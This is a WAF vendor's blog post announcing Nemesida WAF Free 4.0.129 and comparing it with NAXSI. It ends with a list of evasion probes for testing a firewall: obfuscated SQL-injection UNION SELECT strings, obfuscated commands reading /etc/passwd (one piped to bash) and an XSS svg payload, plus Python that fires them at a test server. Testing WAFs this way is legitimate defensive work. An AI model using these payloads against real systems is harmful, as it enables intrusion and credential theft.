New build of Nemesida WAF Free for NGINX

Last year we released Nemesida WAF Free, a lightweight module for NGINX that blocks attacks on web applications. Unlike the commercial version, which relies on machine learning, the free version analyses requests using the signature method only.

What is new in the Nemesida WAF 4.0.129 release

Before this release the Nemesida WAF dynamic module supported only Nginx Stable 1.12, 1.14 and 1.16. The new release adds support for Nginx Mainline, starting from 1.17, and Nginx Plus, starting from 1.15.10 (R18).

Why another WAF?

NAXSI and mod_security are probably the best-known free WAF products, and mod_security is now promoted by Nginx, although originally it was used only with Apache2. Both solutions are free and open source and have a large user base worldwide. For mod_security both a free and a commercial signature set are available, the commercial one at $500 per year; NAXSI ships with free signatures out of the box, and additional rule sets, such as doxsi, can be found.

This year we compared how NAXSI and Nemesida WAF Free perform. Briefly, the results:

  • NAXSI does not perform double URL decoding in cookies, so a payload encoded twice and placed in a cookie is not recognised;
  • NAXSI takes a long time to tune: with the default rule settings it blocks most legitimate requests made while working with a web application (logging in, editing a profile or a post, taking part in a poll, and so on), so exception lists have to be created, which weakens protection. Nemesida WAF Free with default settings did not produce a single false positive while working with the same site;
  • the number of attacks missed by NAXSI was several times higher, etc.
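The first point above, double URL decoding, is worth seeing in code. The following is an added illustration written for this page; it is not NAXSI or Nemesida WAF code, and the single regex signature, the cookie name `session` and the five-round decode cap are assumptions made for the demo. It takes one of the SQL-injection probes from the end of the article, URL-encodes it twice, puts it in a cookie, and shows that a matcher which decodes only once never sees the `union ... select` pattern, while one that decodes until the value stops changing does.

```python
"""Why a WAF must URL-decode every zone, cookies included, until the value
stops changing before matching signatures.  Added example, not product code."""
import re
from urllib.parse import quote, unquote

# Constructed sample: one of the article's SQLi probes, encoded twice.
# An attacker can do this because browsers and proxies do not decode cookie
# values; only the application (or the WAF) does.
PAYLOAD = "')) union/**/select/**/1,/**/2,/**/3#"
COOKIE_HEADER = "session=" + quote(quote(PAYLOAD, safe=""), safe="")

# Deliberately tiny signature: UNION and SELECT separated by whitespace or
# inline comments.  Real rule sets are far larger; the point is the decoding.
SIGNATURE = re.compile(r"union(?:\s|/\*.*?\*/)+select", re.IGNORECASE)


def decode_once(value: str) -> str:
    """What a naive normaliser does: exactly one percent-decode pass."""
    return unquote(value)


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Decode until a fixed point is reached.  The round cap is an assumption
    that keeps a crafted input from making the normaliser spin."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def cookie_value(header: str, name: str) -> str:
    """Pull one cookie out of a raw Cookie header (no decoding here)."""
    for part in header.split(";"):
        key, _, val = part.strip().partition("=")
        if key == name:
            return val
    return ""


def is_attack(value: str, normaliser) -> bool:
    """Run the signature over the normalised value."""
    return SIGNATURE.search(normaliser(value)) is not None


def compare() -> dict:
    """Same cookie, two normalisers: only full decoding catches it."""
    raw = cookie_value(COOKIE_HEADER, "session")
    return {
        "single_decode_blocks": is_attack(raw, decode_once),
        "full_decode_blocks": is_attack(raw, decode_fully),
    }


if __name__ == "__main__":
    print(COOKIE_HEADER)
    print(compare())
```

The same fixed-point decoding applies to the URL, query arguments and body; cookies are simply the zone where single-pass engines most often stop early.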

Despite these shortcomings, NAXSI and mod_security have at least two advantages: open source code and a large user base. We support the idea of publishing the source code, but cannot do so yet because of the risk of "cracked" builds of the commercial version; to compensate, we fully disclose the contents of the signature set. We also value confidentiality and suggest you verify for yourself, through a proxy server, that the module sends nothing out.

Features of Nemesida WAF Free:

  • a high-quality signature database with a minimal number of false positives and false negatives;
  • installation and updates from the repository (fast and convenient);
  • simple and readable incident events, not "confusing" ones like NAXSI's;
  • completely free, with no limits on traffic volume, number of virtual hosts, etc.

Finally, here are several requests for evaluating a WAF (it is recommended to try each of them in every zone: URL, ARGS, Headers & Body):

')) un","ion se","lect 1,2,3,4,5,6,7,8,9,0,11#"]
')) union/**/select/**/1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/'some_text',/**/11#"]
union(select(1),2,3,4,5,6,7,8,9,0x70656e746573746974,11)#"]
')) union+/*!select*/ (1),(2),(3),(4),(5),(6),(7),(8),(9),(0x70656e746573746974),(11)#"]
')) /*!u%6eion*/ /*!se%6cect*/ (1),(2),(3),(4),(5),(6),(7),(8),(9.),(0x70656e746573746974),(11)#"]
')) %2f**%2funion%2f**%2fselect (1),(2),(3),(4),(5),(6),(7),(8),(9),(0x70656e746573746974),(11)#"]
%5B%221807182982%27%29%29%20uni%22%2C%22on%20sel%22%2C%22ect%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C%2some_text%27%2C11%23%22%5D
cat /et?/pa?swd
cat /et'c/pa'ss'wd
cat /et*/pa**wd
e'c'ho 'swd test pentest' |awk '{print "cat /etc/pas"$1}' |bas'h
cat /etc/passwd
cat$u+/etc$u/passwd$u
<svg/onload=alert()//

If any of these requests is not blocked, the WAF will most likely miss a real attack that uses the same evasion. Before running the examples, make sure the WAF does not block legitimate requests, otherwise a "block" result proves nothing.
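Trying each probe in each zone by hand is tedious, so here is an added harness for the procedure described above. It is not part of the article and not Nemesida's tooling; the base URL `http://127.0.0.1:8080/`, the parameter name `q`, the cookie name `probe` and the assumption that a block answers with HTTP 403 are all hypothetical and should be adjusted to the deployment under test. It carries a subset of the article's probes, places each one in the URL path, a query argument, the Cookie and User-Agent headers, and a form body, and reports the combinations the WAF let through.

```python
"""Send each probe into every zone (URL, ARGS, Headers, Body) and list the
ones that were not blocked.  Added example; target and status are assumed."""
import urllib.error
import urllib.request
from urllib.parse import quote

# A subset of the probes listed in the article, copied verbatim.
PROBES = [
    "')) un\",\"ion se\",\"lect 1,2,3,4,5,6,7,8,9,0,11#\"]",
    "')) union/**/select/**/1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/'some_text',/**/11#\"]",
    "union(select(1),2,3,4,5,6,7,8,9,0x70656e746573746974,11)#\"]",
    "cat /et?/pa?swd",
    "cat /et'c/pa'ss'wd",
    "cat$u+/etc$u/passwd$u",
    "<svg/onload=alert()//",
]

ZONES = ("url", "args", "headers", "body")


def build_request(base: str, zone: str, payload: str) -> dict:
    """Place one payload in one zone.  Returns a plain dict so the request can
    be inspected in a test or handed to any HTTP client."""
    enc = quote(payload, safe="")
    if zone == "url":
        return {"method": "GET", "url": f"{base}{enc}", "headers": {}, "body": None}
    if zone == "args":
        # 'q' is an assumed parameter name.
        return {"method": "GET", "url": f"{base}?q={enc}", "headers": {}, "body": None}
    if zone == "headers":
        # Cookie (encoded) and User-Agent (raw) are the header zones that are
        # most often left unchecked.  'probe' is an assumed cookie name.
        return {"method": "GET", "url": base,
                "headers": {"Cookie": f"probe={enc}", "User-Agent": payload},
                "body": None}
    if zone == "body":
        return {"method": "POST", "url": base,
                "headers": {"Content-Type": "application/x-www-form-urlencoded"},
                "body": f"q={enc}".encode()}
    raise ValueError(f"unknown zone {zone!r}")


def send_http(req: dict) -> int:
    """Real sender: returns the HTTP status code, error responses included."""
    r = urllib.request.Request(req["url"], data=req["body"],
                               headers=req["headers"], method=req["method"])
    try:
        with urllib.request.urlopen(r, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def evaluate(base: str, send, block_status: int = 403) -> list:
    """Return (zone, payload) pairs the WAF did NOT answer with block_status.
    'send' is injected so the logic can be exercised without a live target."""
    missed = []
    for zone in ZONES:
        for payload in PROBES:
            if send(build_request(base, zone, payload)) != block_status:
                missed.append((zone, payload))
    return missed


if __name__ == "__main__":
    # Assumed local test target; run a harmless request first to confirm
    # that legitimate traffic is not blocked.
    for zone, payload in evaluate("http://127.0.0.1:8080/", send_http):
        print(f"MISSED [{zone}] {payload}")
```

Run it once with a benign payload list to confirm the baseline returns 200 everywhere, then with the probes; any line printed as MISSED is a zone the signature set is not covering.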

source: www.habr.com
